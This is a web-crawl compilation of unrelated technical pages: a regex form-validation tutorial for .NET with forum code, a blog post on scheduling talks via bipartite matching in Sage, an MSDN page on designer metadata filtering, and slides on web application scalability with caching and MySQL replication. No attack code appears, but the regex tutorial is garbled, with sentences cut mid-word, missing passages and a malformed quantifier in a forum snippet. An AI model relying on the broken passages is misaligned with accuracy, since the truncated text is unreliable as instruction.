event provides us with a means for performing key-press validation. This type of validation provides the user with immediate feedback when an invalid character is typed. It can be paired with completion validation to provide a complete check of data entered by the user. We will use several examples of key-press-completion validation later in this article. I generally recommend using key-press validators to ensure that no invalid characters are entered into a field. Pair the key-press validator with a completion validator to verify that the contents of the control match any pattern that may be required. We will see several examples of this type of validation, using floating point numbers, dates, and telephone numbers, later in the article. Submission validation will still be required for some purposes, such as ensuring that required fields are not left blank. But as a rule, it should be relied on as little as possible. Now that we have seen how to validate, let$’. These two symbols mark the beginning and end of a line, respectively. Enter this into the Regex box of Regex Tester: ^$ The Regex box turns green, indicating that the regex is valid. The Test box is also green, indicating that an empty string is allowed. Now type something, anything, in the Test box. It doesn” reading of the regex. To verify, type in any number of digits in the Test box. It stays green. But type in any other character, and the box turns red. What we have just done is create a regex that can validate a text box as containing an integer. Clear the boxes, and enter the same regex again. Now, replace the asterisk with a plus sign. Now the regex reads: “Match any string that consists of a sequence of one or more digits”. Empty strings are now disallowed. When you change the asterisk to a plus sign, the empty Test box should turn red, since empties are no longer allowed. Otherwise, the box behaves just as it did before. The only difference between the asterisk and the plus sign is that the asterisk allows empties, and the plus sign doesn’t. As we will see later, these symbols can be applied to an entire regex, or to part of a regex. We will see how, when we look at grouping. The validators we worked with in the last section will validate integers, but not real numbers. Use either of the preceding regexes, and enter the following number:.45’ into the Test box. This time, the box should be red until you enter the decimal point. Then it turns green, until you enter the 4, when it turns red again. Clearly, we have some more work to do. The Test box turned red until you hit the decimal point because it is a required character. No matter how many numbers you enter, they must be followed by a decimal point. That would work fine for a completion validator, but it won’t work for a key-press validator. In that case, we want to allow the period, but not require it. The solution is to make the period optional. We do that by putting a question mark after the period, like this: ^[0-9]+\.?$ Try it in Regex Tester, entering 123.45 once again. The Test box will stay green until you type the ‘4’, at which point it will turn red again. We have taken care of the decimal-point problem, but we still need to do something about the numbers that follow it. Our problem is that the decimal point is the last item specified in the pattern. That means, nothing can come after it. But we want more numbers to come after it! Then we should add them to our pattern, like this: ^[0-9]+\.?[0-9]*$ Try that pattern in the Regex box, and type ‘123.45’ in the Test box. The box should be red when it is empty, but green when an integer or a real number is typed into it. Note that for the decimal portion of the number, we used an asterisk, instead of a plus sign. That means, the decimal portion can have zero elements—we have, in effect, made the decimal portion of the number optional, as well. There is only one problem that remains. Let’s assume we have a text box that we need to validate for a real number, and that an empty is not allowed for this text box. Our current validators will do the job for a completion validator, but not for a key-press validator. Why not? Try this: select after the number in the Test box, then backspace until you remove the last digit. When you do, the box turns red. That means, if the user starts entering a number, then deletes it by backspacing, a glyph is going to pop up. To the user, that’s a bug. What it means for us is that we need slightly different regexes for the two validators. The key-press regex should disallow empties, but the completion regex needs to allow them. To do that, change the plus sign in the regex to an asterisk, so that the regex looks like this: ^[0-9]*\.?[0-9]*$ Now, the Test box is green, even when it is empty. Use this modified regex in the key-press validator. This approach gives us the best of both worlds; the user gets immediate feedback while entering the number, and empties are flagged as errors without getting in the user’s way. The preceding examples point out the need for validator pairs. In many cases, we need a key-press validator to ensure that no invalid characters are entered, and a separate completion validator to ensure that the field matches whatever pattern is required. By now, you should be getting the hang of simple validators. Regular expressions are as powerful as you want them to be—they constitute a language all their own. But as you have seen, you can get started with just a few elements. Here are some other handy elements of regular expression syntax: Groups: Parentheses are used to group items. Here is a regex for the comma-delimited list of integers I mentioned earlier: ^([0-9]*,?)*$ Here is how to read allowed by the pattern. We can modify the pattern to allow spaces, by using a feature known as alternates. Alternates are specified by using the pipes (|) character within a group. Here is how the last regex looks when we allow a comma-space combination as an alternative to a simple comma: ^([0-9]*(,|, )?)*$ Note that there is a space after the second comma in the regex. The group with the commas now reads: “…followed by a comma, or a comma and a space…” Now, type in a comma-delimited list of integers with a space after each comma. The Test box stays green, so long as you enter only a single space after each comma. But suppose you want to let the user type an unlimited number of spaces after each comma? Here is an opportunity to test yourself. See if you can modify the last regex to allow unlimited spaces. Don’t peek at the answer until you have given it a try. The simple answer is to add an asterisk after the space in the alternate group: ^([0-9]*(,|, *)?)*$ That regex will work, but we can tweak it a bit to make it more elegant. The comma-space-asterisk alternate means: “Followed by a comma, followed by zero or more spaces.” But that makes the first alternate redundant. And that means, we can delete the first alternate entirely, which brings us to the final answer: ^([0-9]*(, *)?)*$ Again, note the space after the comma. This solution is both shorter and easier to understand than our original solution. Hopefully, this exercise gives you a feel for the process of developing a regular expression. They are not’. Copy that regex to Regex Tester and give it a try. Note that the validation fails if the user enters dashes, instead of slashes, between the parts of the date. How could we increase the flexibility of our regex to accommodate dashes? Think about the question for a minute before moving on. All we need to do is add a dash to the alternates group: ^([0-9]|/|-)*$ We could add other alternates to make the regex as flexible as it needs to be. The completion validator does a final check to determine whether the input matches a complete date pattern: ^[0-2]?[1-9](/|-)[0-3]?[0-9](/|-)[1-2][0-9][0-9][0-9]$ The regex reads as follows: "Match any string that conforms to this pattern: The first character can be a 0, 1, or 2, and it may be omitted. The second character can be any number and is required. The next character can be a slash or a dash, and is required…”]’ allows upper or lower-case letters. Our date regex also points out some of the limitations of regex validation. Paste the date regex shown into Regex Tester and try out some dates. The regex does a pretty good job with run-of-the-mill dates, but it allows some patently invalid ones, such as ‘29/29/2006’, or ‘12/39/2006'. The regex is clearly not ‘bulletproof’. We could beef up the regular expression with additional features to catch these invalid dates, but it may be simpler to simply use a bit of .NET in the completion validator: bool isValid = DateTime.TryParse(dateString, out dummy); We gain the additional benefit that .NET will check the date for leap year validity, and so on. As always, the choice comes down to: What is simpler? What is faster? What is more easily understood? In my shop, we use a regex for the key-press validator, and DateTime.TryParse() for the completion validator. DateTime.TryParse() Telephone numbers: Telephone numbers are similar to dates, in that they follow a fixed pattern. Telephone numbers in the US follow the pattern (nnn) nnn-nnnn, where n equals any digit. But creating a regex for a telephone number presents a new problem: How do we include parentheses in our pattern, when parentheses are special characters that specify the start and end of a group? Another way of stating the problem is: We want to use parentheses as literals, and not as special characters. To do that, we simply escape them by adding a backslash in front of them. Any special character (including the backslash itself) can be escaped in this manner. Backslash characters are also used for shortcuts in regular expressions. For example,.” The key-press validator will ensure that invalid characters are not entered, but it will not perform a full pattern matching. For that, we need a separate completion validator: ^\(\d\d\d\) \d\d\d-\d\d\d\d$ This validator specifies the positions of the parentheses and the dash, and the position of each digit. In other words, it verifies not only that all characters are valid, but that they match the pattern of a U.S. telephone number. Neither one of these regular expressions is bulletproof, but they will give you a good starting point for developing your own regular expressions. If you come up with a good one, why not post it as a comment to this article? We have barely scratched the surface of regular expressions, but we have accomplished what we set out to do. At the beginning of this article, I promised that you would be able to write simple validators, and that you would know enough to dig further into the subject. At this point, you should be able to do both. There are thousands of regular expression resources on the Web. I would particularly recommend the following two web sites: Also worthy of note is The 30 Minute Regex Tutorial, an article on CodeProject. It includes a nice regex utility called Expresso. The reason I didn to me! This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below. A list of licenses authors might use can be found here public ContactInfo() { InitializeComponent(); txtFirstName.Tag = new RegexValidator("^[A-Z][a-z]{0-19}$", "First name is required. (Title case formatted)"); txtMiddleInitial.Tag = new RegexValidator("^[A-Z]?$", "Middle initial must be uppercase"); txtLastName.Tag = new RegexValidator("^[A-Z][a-z]{0-19}$", "Last name is required. (Title case formatted)"); txtAddress.Tag = new RegexValidator(@"(?=.*\w)", "Must enter at least one non-whitespace character"); txtCity.Tag = new RegexValidator(@"(?=.*\w)", "Must enter at least one non-whitespace character"); txtZip.Tag = new RegexValidator(@"^\d{5}(-\d{4})?$", "Must be of the form XXXXX or XXXXX-XXXX"); } private void allTextBox_Validating(object sender, CancelEventArgs e) { Control validControl = (Control)sender; //RegexValidator regExVal = new RegexValidator(); //regExVal = (RegexValidator)validControl.Tag; RegexValidator regExVal = validControl.Tag as RegexValidator; if (regExVal != null) { if (!regExVal.Validate(validControl.Text)) { e.Cancel = true; errorProvider1.SetError(validControl, regExVal.ErrorMessage); } } } </pre?> <pre> public bool Validate(string validatedStr) { string trimmedStr = validatedStr.Trim(); //for debugging purposes bool result = Regex.IsMatch(trimmedStr, regExpPattern); string resultStr = string.Format("The result of IsMatch() is: {0}", result); MessageBox.Show(resultStr, "Debugging"); return Regex.IsMatch(trimmedStr, regExpPattern); } private void textBox1_Validating(object sender, CancelEventArgs e)<br /> {<br /> double parsedValue;<br /> bool success = double.TryParse(textBox1.Text, out parsedValue);<br /> if (success)<br /> {<br /> parsedValue = -(Math.Abs(parsedValue));<br /> textBox1.Text = parsedValue.ToString("N0");<br /> errorProvider1.SetError(textBox1, String.Empty);<br /> }<br /> else<br /> {<br /> errorProvider1.SetError(textBox1, "Not a number");<br /> }<br /> } General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
https://www.codeproject.com/Articles/13255/Validation-with-Regular-Expressions-Made-Simple?msg=2785094
CC-MAIN-2017-43
en
refinedweb
I need to schedule 40ish talks and this needs to fit around the student availability as well as my own. In this post I'll describe how I did this using a combination of Doodle, +Sage Mathematical Software System and Graph Theory. The beginning of this post will be some of the boring details but towards the end I start talking about the mathematics (so feel free to skip to there...). First of all I needed to know my students availability. For this I simply used Doodle:. I kind of use Doodle for every meeting I have to schedule (they also offer a cool tool that lets you show your availability so students/colleagues have an indication of when I might be able to meet with them). Here's a screenshot of the responses: You can't really see anything there as I had to zoom out a lot to grab the whole picture. Doodle allows you to download the information for any given poll in .xls format so I could relatively easily obtain the biadjacency matrix $M$ for my problem. Where $M_{ij}$ is 1 if group $i$ is available for schedule slot $j$ and 0 otherwise. The mathematics and code needed. Once I've got a .csv file (by tweaking the .xls file) of the biadjacency matrix I import that in to +Sage Mathematical Software System and convert it to an instance of the `Matrix` class using the following: import csv f=open(DATA+'availabilitymatrix','r') data = [[int(j) for j in row] for row in csv.reader(f)] f.close() M = Matrix(data) I then need to remove any particular scheduled slots that are not picked by any company: M = matrix([row for row in M.transpose() if max(row) != 0]).transpose() Once I've done this I can define the bi-partite graph (bi-partite simply means that the vertices can be separated in to 2 non adjacent collections): g = BipartiteGraph(M) We can then get a get a picture of this, I do this using a 'partition' (a graph colouring) that will colour the groups (red) and the schedule slots (blue): g = BipartiteGraph(M) p = g.coloring() g.show(layout='circular',dist=1,vertex_size=250, graph_border=True, figsize=[15,15],partition=p) p = g.coloring() g.show(layout='circular',dist=1,vertex_size=250, graph_border=True, figsize=[15,15],partition=p) The various options I pass to the `show` command are simply to get the circular arrangement (and other minor things): The above looks quite messy and what I essentially want is get as many pairwise matchings between the blue vertices (slots) and red vertices (companies) so that each schedule slot is attributed at most 1 company and every company has at least 1 schedule slot. On any given graph $G=(V,E)$ this problem is known as looking for a maximal matching and can be written down mathematically: Max: $\sum_{e \in E(G)} m_e$ Such that: $\forall v$ $\sum_{e \in E(G) \atop v \sim e} m_e \leq 1$ We are in essence finding a subset of edges of our original graph in such a way as to maximise the number of edges such that no vertex has more than 1 edge. This is all explained extremely well at the +Sage Mathematical Software System documentation pages here. Furthermore at the documentation the code needed to solve the problem is also given: p = MixedIntegerLinearProgram() matching = p.new_variable(binary=True) p.set_objective(sum(matching[e] for e in g.edges(labels=False))) for v in g: p.add_constraint(sum(matching[e] for e in g.edges_incident(v, labels=False)) <= 1) p.solve() When I run the above, `p` is now a solved Mixed Integer Linear Program (corresponding to the matching problem described). To obtain the solution: matching = p.get_values(matching) schedule = [e for e,b in matching.iteritems() if b == 1] schedule = [e for e,b in matching.iteritems() if b == 1] Calling `schedule` gives a set of edges (denoted by the corresponding vertex numbers): [(5, 57), (0, 45), (23, 50), (4, 42), (38, 60), (26, 56), (34, 62), (16, 68), (1, 43), (7, 40), (9, 44), (36, 58), (12, 49), (35, 71), (28, 66), (25, 47), (24, 53), (6, 46), (3, 64), (39, 67), (17, 69), (22, 55), (13, 48), (33, 41), (10, 63), (21, 61), (30, 52), (29, 65), (37, 70), (15, 54), (19, 51), (11, 59)] (25, 47), (24, 53), (6, 46), (3, 64), (39, 67), (17, 69), (22, 55), (13, 48), (33, 41), (10, 63), (21, 61), (30, 52), (29, 65), (37, 70), (15, 54), (19, 51), (11, 59)] It is then really easy to draw another graph: B=Graph(schedule) p = B.coloring() B.show(layout='circular',dist=1,vertex_size=250, graph_border=True, figsize=[15,15],partition=p) p = B.coloring() B.show(layout='circular',dist=1,vertex_size=250, graph_border=True, figsize=[15,15],partition=p) You can see that the obtained graph has all the required properties and most importantly is a lot less congested. Some details. I'm leaving out some details, for example I kept track of the names of the companies and also the slots so that the final output of all this looked like this: 4InARow: Fri1100 Abacus: Tue0930 Alpha1: Thu1130 Alpha2: Mon0930 AusfallLtd: Fri1230 AxiomEnterprise: Thu1000 Batduck: Thu1430 CharliesAngles: Thu1500 CwmniRhifau: Mon1330 EasyasPi: Fri1130 Evolve: Thu1300 HSPLLtd.: Mon1030 JECT: Tue1200 JJSL: Thu1030 JNTL: Mon1400 JennyCash: Tue1630 KADE: Fri1330 MIAS: Fri1300 MIPE: Thu1100 MLC: Tue1600 Nineties: Mon0900 Promis: Fri1400 R.A.C.H: Tue1530 RYLR: Tue1230 SBTP: Fri1030 Serendipity: Mon1230 UniMath: Tue1300 VectorEnterprises: Tue1330 Venus: Thu1400 codeX: Mon1300 dydx: Wed1630 eduMath: Thu0930 (BatDuck is my favourite company name by far...) Why did I do this this way? There are 3 reasons: 1. I shared the schedule with my students through a published Sage sheet on our server. That way they can see a direct applied piece of mathematics and can also understand some of the code if they wanted to. 2. "Point and click doesn't scale" - I'm sure I could have solved this one instance of my problem with pen and paper and some common sense faster than it took me to write the code to solve the problem. The thing is next year when I need to schedule these talks again it will at most take me 3 minutes as the code is all here and ready to go. (Most readers of this blog won't need that explained but if any of my students find their way here: that's an important message for you). 3. It was fun.
http://drvinceknight.blogspot.co.uk/2014_03_01_archive.html
CC-MAIN-2017-43
en
refinedweb
Metadata Filtering Metadata filtering allows a designer to modify the set of properties, attributes and events exposed by a component or control at design time. For example, Control has a property named Visible that determines whether the control is visible. At design time, however, the control should always remain visible, regardless of the value of this property, so that a developer can position it on the design surface. The designer for Control replaces the Visible property with its own version at design time and later restores the run-time value of this property. To perform metadata filtering, a designer can either implement the IDesignerFilter interface, or add an ITypeDescriptorFilterService implementation to the design-time services provider that can perform metadata filtering on any component in the design-time environment. When a component is selected at design time, the property browser queries the component for its attributes, events, and properties through the methods of a TypeDescriptor. When a component is queried for its attributes, events, and properties in design mode, any designer for the component that implements the IDesignerFilter interface is given an opportunity to modify the set of attributes, events, and properties returned by the component. The methods of any active ITypeDescriptorFilterService are called next to allow the service to do any filtering of attributes, events and properties. A component in design mode is typically queried for its attributes, events and properties when the Refresh method of TypeDescriptor is called on the component, when the Properties window is refreshed, when design mode is established or reestablished, and when the primary selection is set. Methods of other objects or a design-time environment may call the methods of a TypeDescriptor at other times. The IDesignerFilter interface defines a set of methods that can be overridden and implemented in a designer to alter the properties, events, or attributes exposed by the component managed by the designer at design time. Each method of the IDesignerFilter interface is prefixed with either "Pre" or "Post". Each method is suffixed with either "Attributes", "Events", or "Properties", depending on which type of member it allows you to add, change, or remove. To add any attributes, events, or properties, use the relevant method whose name begins with "Pre". To change or remove any attributes, events, or properties, use the relevant method whose name begins with "Post". The methods whose names begin with "Pre" are called immediately before the methods whose names begin with "Post".. The following code example block shows the method signatures of the IDesignerFilter interface. public interface IDesignerFilter { void PostFilterAttributes(IDictionary attributes); void PostFilterEvents(IDictionary events); void PostFilterProperties(IDictionary properties); void PreFilterAttributes(IDictionary attributes); void PreFilterEvents(IDictionary events); void PreFilterProperties(IDictionary properties); } The following code example demonstrates an implementation of IDesignerFilter that adds a Color property of the designer to the associated component. You need to add a reference to System.Design.dll. using System; using System.ComponentModel; using System.ComponentModel.Design; using System.Drawing; using System.Windows.Forms; using System.Windows.Forms.Design; namespace IDesignerFilterSample { public class DesignerFilterDesigner : ComponentDesigner, IDesignerFilter { // Designer color property to add to component. public Color TestColor { get { return this.intcolor; } set { this.intcolor = value; } } // Color for TestColor property. private Color intcolor = Color.Azure; public DesignerFilterDesigner() {} // Adds a color property of this designer to the component. protected override void PreFilterProperties(System.Collections.IDictionary properties) { base.PreFilterProperties(properties); // Adds a test property to the component. properties.Add("TestColor", TypeDescriptor.CreateProperty(typeof(DesignerFilterDesigner), "TestColor", typeof(System.Drawing.Color), null)); } } // Component with which the DesignerFilterDesigner is associated. [Designer(typeof(DesignerFilterDesigner))] public class TestComponent : Component { public TestComponent() {} } } For an example of a Windows Forms control designer that implements property filtering using the IDesignerFilter interface, see the Windows Forms Designer Sample. You can provide metadata filtering for any component in a design-time project by adding an ITypeDescriptorFilterService implementation to the service provider that provides services at design time, using the AddService method of the IServiceContainer interface implemented by the ISite returned by the Site property of a Component sited in design mode. The following code example demonstrates how to add an ITypeDescriptorFilterService service called ExampleFilterService. IDesignerHost dh = (IDesignerHost)this.Component.GetService(typeof(IDesignerHost)); if( dh != null ) { // First gets any previous ITypeDescriptorFilterService to replace when // the current service is removed, and to call if the new service // implements service chaining. ITypeDescriptorFilterService itdfs = (ITypeDescriptorFilterService)dh.GetService( typeof(ITypeDescriptorFilterService)); oldService = (ITypeDescriptorFilterService)dh.GetService( typeof(ITypeDescriptorFilterService)); if(oldService != null) // Removes any old ITypeDescriptorFilterService. dh.RemoveService(typeof(ITypeDescriptorFilterService)); // Adds an ExampleFilterService that implements service chaining. dh.AddService(typeof(ITypeDescriptorFilterService), new ExampleFilterService(oldService)); } For an example ITypeDescriptorFilterService implementation, see the reference documentation for the ITypeDescriptorFilterService class.
https://msdn.microsoft.com/en-us/library/tbt775x3.aspx
CC-MAIN-2017-43
en
refinedweb
Are you sure? This action might not be possible to undo. Are you sure you want to continue? com/group/scalable Real World Web: Performance & Scalability Ask Bjørn Hansen Develooper LLC April 14, 2008 – r17 Hello. • I’m Ask Bjørn Hansen perl.org, ~10 years of mod_perl app development, mysql and scalability consulting YellowBot • I hate tutorials! • Let’s do 3 hours of 5 minute° lightning talks! ° Actual number of minutes may vary Construction Ahead! • • • • Conflicting advice ahead Not everything here is applicable to everything Ways to “think scalable” rather than be-all-end-all solutions Don’t prematurely optimize! (just don’t be too stupid with the “we’ll fix it later” stuff) Questions ... • • • • • • • • How many ... ... are using PHP? Python? Python? Java? Ruby? C? 3.23? 4.0? 4.1? 5.0? 5.1? 6.x? MyISAM? InnoDB? Other? Are primarily “programmers” vs “DBAs” Replication? Cluster? Partitioning? Enterprise? Community? PostgreSQL? Oracle? SQL Server? Other? Seen this talk before? Slide count 200 • • • No, you haven’t. :-) 150 100 ~266 people * 3 hours = half a work year! 50 0 2001 2004 2006 2007 2008 Question Policy! • • • • • Do we have time for questions? Yes! (probably) Quick questions anytime Long questions after Slides per minute 1.75 1.00 • or on the list! 0.25 2001 2002 2004 2005 2006 (answer to anything is likely “it depends” or “let’s talk about it after / send me an email”) 2007 2008 • • The first, last and only lesson: Think Horizontal! • Everything in your architecture, not just the front end web servers • Micro optimizations and other implementation details –– Bzzzzt! Boring! (blah blah blah, we’ll get to the cool stuff in a moment!) Benchmarking techniques • Scalability isn't the same as processing time • • • • • • Not “how fast” but “how many” Test “force”, not speed. Think amps, not voltage Test scalability, not just “performance” Test with "slow clients" Use a realistic load Testing “how fast” is ok when optimizing implementation details (code snippets, sql queries, server settings) Vertical scaling • • • • • “Get a bigger server” “Use faster CPUs” Can only help so much (with bad scale/$ value) A server twice as fast is more than twice as expensive Super computers are horizontally scaled! Horizontal scaling • • • “Just add another box” (or another thousand or ...) Good to great ... • • Implementation, scale your system a few times Architecture, scale dozens or hundreds of times Get the big picture right first, do micro optimizations later Scalable Application Servers Don’t paint yourself into a corner from the start Run Many of Them • • • • Avoid having The Server for anything Everything should (be able to) run on any number of boxes Don’t replace a server, add a server Support boxes with different capacities Stateless vs Stateful • • • “Shared Nothing” Don’t keep state within the application server (or at least be Really Careful) Do you use PHP, mod_perl, mod_... • • Anything that’s more than one process You get that for free! (usually) Sessions “The key to be stateless” or “What goes where” No Local Storage • • • Ever! Not even as a quick hack. Storing session (or other state information) “on the server” doesn’t work. “But my load balancer can do ‘sticky sessions’” • • Uneven scaling – waste of resources (and unreliable, too!) The web isn’t “session based”, it’s one short request after another – deal with it Evil Session Cookie: session_id =12345 Web/application server with local Session store What’s wrong with this? ... 12345 => { user => { username => 'joe', email => '[email protected]', id => 987, }, shopping_cart => { ... }, last_viewed_items => { ... }, background_color => 'blue', }, 12346 => { ... }, .... Evil Session Cookie: session_id =12345 Easy to guess cookie id Saving state on one server! Web/application server with local Session store ... 12345 => { user => { username => 'joe', email => '[email protected]', id => 987, }, shopping_cart => { ... }, last_viewed_items => { ... }, background_color => 'blue', }, 12346 => { ... }, .... Duplicate data from a DB table Big blob of junk! What’s wrong with this? Cookie: sid=seh568fzkj5k09z; user=987-65abc; bg_color=blue; cart=...; Good Session! Web/application server • Stateless Database(s) Users 987 => { username => 'joe', email => '[email protected]', }, ... Shopping Carts ... web server! database memcached cache seh568fzkj5k09z => { last_viewed_items => {...}, ... other "junk" ... }, .... • Important data in • Individual expiration on session objects in cookies • Small data items Safe cookies • • Worried about manipulated cookies? Use checksums and timestamps to validate • • cookie=1/value/1123157440/ABCD1234 cookie=$cookie_format_version /$value/$timestamp /$checksum • function cookie_checksum { md5_hex( $secret + $time + value ); } Safe cookies • Want fewer cookies? Combine them: • • cookie=1/user::987/cart::943/ts::1123.../EFGH9876 cookie=$cookie_format_version /$key::$value[/$key::$value] /ts::$timestamp /$md5 • Encrypt cookies if you must (rarely worth the trouble and CPU cycles) I did everything – it’s still slow! • • • • Optimizations and good micro-practices are necessary, of course But don’t confuse what is what! Know when you are optimizing Know when you need to step back and rethink “the big picture” Caching How to not do all that work again and again and again... Cache hit-ratios • • • • • Start with things you hit all the time Look at web server and database logs Don’t cache if you’ll need more effort writing to the cache than you save Do cache if it’ll help you when that one single page gets a million hits in a few hours (one out of two hundred thousand pages on the digg frontpage) Measure! Don’t assume – check! Generate Static Pages • • • • • Ultimate Performance: Make all pages static Generate them from templates nightly or when updated Doesn’t work well if you have millions of pages or page variations Temporarily make a page static if the servers are crumbling from one particular page being busy Generate your front page as a static file every N minutes Cache full pages (or responses if it’s an API) • • • • Cache full output in the application Include cookies etc. in the “cache key” Fine tuned application level control The most flexible • • “use cache when this, not when that” (anonymous users get cached page, registered users get a generated page) Use regular expressions to insert customized content into the cached page Cache full pages 2 • • • • Front end cache (Squid, Varnish, mod_cache) stores generated content • • Set Expires/Cache-Control header to control cache times or Rewrite rule to generate page if the cached file doesn’t exist (this is what Rails does or did...) – only scales to one server RewriteCond %{REQUEST_FILENAME} !-s RewriteCond %{REQUEST_FILENAME}/index.html !-s RewriteRule (^/.*) /dynamic_handler/$1 [PT] Still doesn’t work for dynamic content per user (”6 items in your cart”) Works for caching “dynamic” images ... on one server Cache partial pages • • • • Pre-generate static page “snippets” (this is what my.yahoo.com does or used to do...) • Have the handler just assemble pieces ready to go Cache little page snippets (say the sidebar) Be careful, easy to spend more time managing the cache snippets than you save! “Regexp” dynamic content into an otherwise cached page Cache data • • • • • Cache data that’s slow to query, fetch or calculate Generate page from the cached data Use the same data to generate API responses! Moves load to cache servers • (For better or worse) Good for slow data used across many pages (”todays bestsellers in $category”) Caching Tools Where to put the cache data ... A couple of bad ideas Don’t do this! • • • Process memory ($cache{foo}) • • • • • Not shared! Limited to one machine (likewise for a file system cache) Some implementations are really fast Flushed on each update Nice if it helps; don’t depend on it Shared memory? Local file system? MySQL query cache • • • • • Write into one or more cache tables id is the “cache key” type is the “namespace” MySQL cache table metadata for things like headers for cached http responses purge_key to make it easier to delete data from the cache CREATE TABLE `combust_cache` ( `id` varchar(64) NOT NULL, `type` varchar(20) NOT NULL default '', `created` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `purge_key` varchar(16) MySQL Cache Fails • • • Scaling and availability issues • • How do you load balance? How do you deal with a cache box going away? Partition the cache to spread the write load Use Spread to write to the cache and distribute configuration • General theme: Don’t write directly to the DB MySQL Cache Scales • • • • • • Persistence Most of the usual “scale the database” tricks apply Partitioning Master-Master replication for availability .... more on those things in a moment Put metadata in memcached for partitioning and failover information memcached • • • • • LiveJournal’s distributed caching system (used practically everywhere!) Memory based – memory is cheap! Linux 2.6 (epoll) or FreeBSD (kqueue) • Low overhead for many many connections Run it on boxes with free memory ... or a dedicated cluster: Facebook has more than five hundred dedicated memcached servers (a lot of memory!) more memcached • • • • • • No “master” – fully distributed Simple lightweight protocol (binary protocol coming) Scaling and high-availability is “built-in” Servers are dumb – clients calculate which server to use based on the cache key Clients in perl, java, php, python, ruby, ... New C client library, libmemcached How to use memcached • • • It’s a cache, not a database Store data safely somewhere else Pass-through cache (id = session_id or whatever): Read $data = memcached_fetch( $id ); return $data if $data $data = db_fetch( $id ); memcached_store( $id, $data ); return $data; Write db_store( $id, $data ); memcached_store( $id, $data ); Client Side Replication • • • • memcached is a cache - the data might “get lost” What if a cache miss is Really Expensive? Store all writes to several memcached servers Client libraries are starting to support this natively Store complex data • • • • Most (all?) client libraries support complex data structures A bit flag in memcached marks the data as “serialized” (another bit for “gzip”) All this happens on the client side – memcached just stores a bunch of bytes Future: Store data in JSON? Interoperability between languages! Store complex data 2 • • Primary key lookups are probably not worth caching Store things that are expensive to figure out! function get_slow_summary_data($id) { $data = memcached_fetch( $id ); return $data if $data $data = do_complicated_query( $id ); memcached_store( $id, $data ); return $data; } Cache invalidation • • • • • • • Writing to the cache on updates is hard! Caching is a trade-off You trade “fresh” for “fast” Decide how “fresh” is required and deal with it! Explicit deletes if you can figure out what to delete Add a “generation” / timestamp / whatever to the cache key select id, unix_timestamp(modified_on) as ts from users where username = ‘ask’; memcached_fetch( “user_friend_updates; $id; $ts” ) Caching is a trade-off • • Can’t live with it? Make the primary data-source faster or data-store scale! Database scaling How to avoid buying that gazillion dollar Sun box ~$4,000,000 Vertical ~$3,200 ( = 1230 for $4.0M!) Be Simple • Use MySQL! • • • It’s fast and it’s easy to manage and tune Easy to setup development environments Other DBs can be faster at certain complex queries but are harder to tune – and MySQL is catching up! • • Avoid making your schema too complicated Ignore some of the upcoming advice until you REALLY need it! • • (even the part about not scaling your DB “up”) PostgreSQL is fast too :-) Replication More data more places! Share the love load Basic Replication • • • Good Great for read intensive applications Write to one master Read from many slaves reads webservers writes master writes slave slave slave reads Lots more details in “High Performance MySQL” old, but until MySQL 6 the replication concepts are the same loadbalancer Relay slave replication • • • • Running out of bandwidth on the master? Replicating to multiple data centers? A “replication slave” can be master to other slaves Almost any possible replication scenario can be setup (circular, star replication, ...) reads webservers writes data loading script writes master writes relay slave A relay slave B slave slave slave slave slave slave reads loadbalancer Replication Scaling – Reads • • Reading scales well with replication Great for (mostly) read-only applications One server Two servers capacity reads reads writes writes reads writes (thanks to Brad Fitzpatrick!) Replication Scaling – Writes (aka when replication sucks) • • reads Writing doesn’t scale with replication All servers needs to do the same writes reads reads reads reads reads capacity writes writes writes writes writes writes Partition the data Divide and Conquer! or Web 2.0 Buzzword Compliant! Now free with purchase of milk!! Partition your data • 96% read application? Skip this step... Cat cluster master slave master slave Dog cluster • Solution to the too many writes problem: Don’t have all data on all servers different data sets slave slave slave slave • Use a separate cluster for The Write Web! • • • • • dogs Replication too slow? Don’t have replication slaves! Use a (fake) master-master setup and partition / shard the data! Simple redundancy! No latency from commit to data being available Don’t bother with fancy 2 or 3 phase commits master master cats master master fish • (Make each “main object” (user, product, ...) always use the same master – as long as it’s available) master master Partition with a global master server • • • • • • Can’t divide data up in “dogs” and “cats”? Flexible partitioning! The “global” server keeps track of which cluster has the data for user “623” Get all PKs from the global master Only auto_increment columns in the “global master” Aggressively cache the “global master” data (memcached) webservers Where is user 623? user 623 is in cluster 3 global master slave (backup) master master • and/or use MySQL Cluster (ndb) data clusters select * from some_data where user_id = 623 cluster 3 cluster 2 cluster 1 Master – Master setup • • • • Setup two replicas of your database copying changes to each-other Keep it simple! (all writes to one master) Instant fail-over host – no slave changes needed Configuration is easy! • set-variable set-variable = auto_increment_increment=2 = auto_increment_offset=1 • • (offset = 2 on second master) Setup both systems as a slave of the other Online Schema Changes The reasons we love master-master! • Do big schema changes with no downtime! • • • • • • Stop A to B replication Move traffic to B Do changes on A Wait for A to catchup on replication Move traffic to A Re-start A to B replication Hacks! Don’t be afraid of the data-duplication monster http://flickr.com/photos/firevixen/75861588/ Summary tables! • Find queries that do things with COUNT(*) and GROUP BY and create tables with the results! • • • • Data loading process updates both tables or hourly/daily/... updates Variation: Duplicate data in a different “partition” Data affecting both a “user” and a “group” goes in both the “user” and the “group” partition (Flickr does this) Summary databases! • • • Don’t just create summary tables Use summary databases! Copy the data into special databases optimized for special queries • • • • full text searches index with both cats and dogs anything spanning all clusters Different databases for different latency requirements (RSS feeds from replicated slave DB) Make everything repeatable • • • • Script failed in the middle of the nightly processing job? (they will sooner or later, no matter what) How do you restart it? Build your “summary” and “load” scripts so they always can be run again! (and again and again) One “authoritative” copy of a data piece – summaries and copies are (re)created from there Asynchronous data loading • • • • • Updating counts? Loading logs? Don’t talk directly to the database, send updates through Spread (or whatever) to a daemon loading data Don’t update for each request update counts set count=count+1 where id=37 Aggregate 1000 records or 2 minutes data and do fewer database changes update counts set count=count+42 where id=37 Being disconnected from the DB will let the frontend keep running if the DB is down! “Manual” replication • • • • • • • Save data to multiple “partitions” Application writes two places or last_updated/modified_on and deleted columns or Use triggers to add to “replication_queue” table Background program to copy data based on the queue table or the last_updated column Build summary tables or databases in this process Build star/spoke replication system Preload, -dump and -process • Let the servers do as much as possible without touching the database directly • • • Data structures in memory – ultimate cache! Dump never changing data structures to JS files for the client to cache Dump smaller read-only often accessed data sets to SQLite or BerkeleyDB 